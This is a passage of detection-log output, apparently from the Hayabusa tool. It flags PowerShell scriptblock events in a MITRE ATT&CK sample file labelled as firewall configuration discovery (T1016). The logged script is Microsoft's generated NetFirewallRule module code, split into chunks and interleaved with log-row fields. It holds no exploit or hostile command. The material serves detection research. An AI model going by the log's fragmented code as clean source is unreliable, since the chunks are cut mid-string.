ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() 
if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 
'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 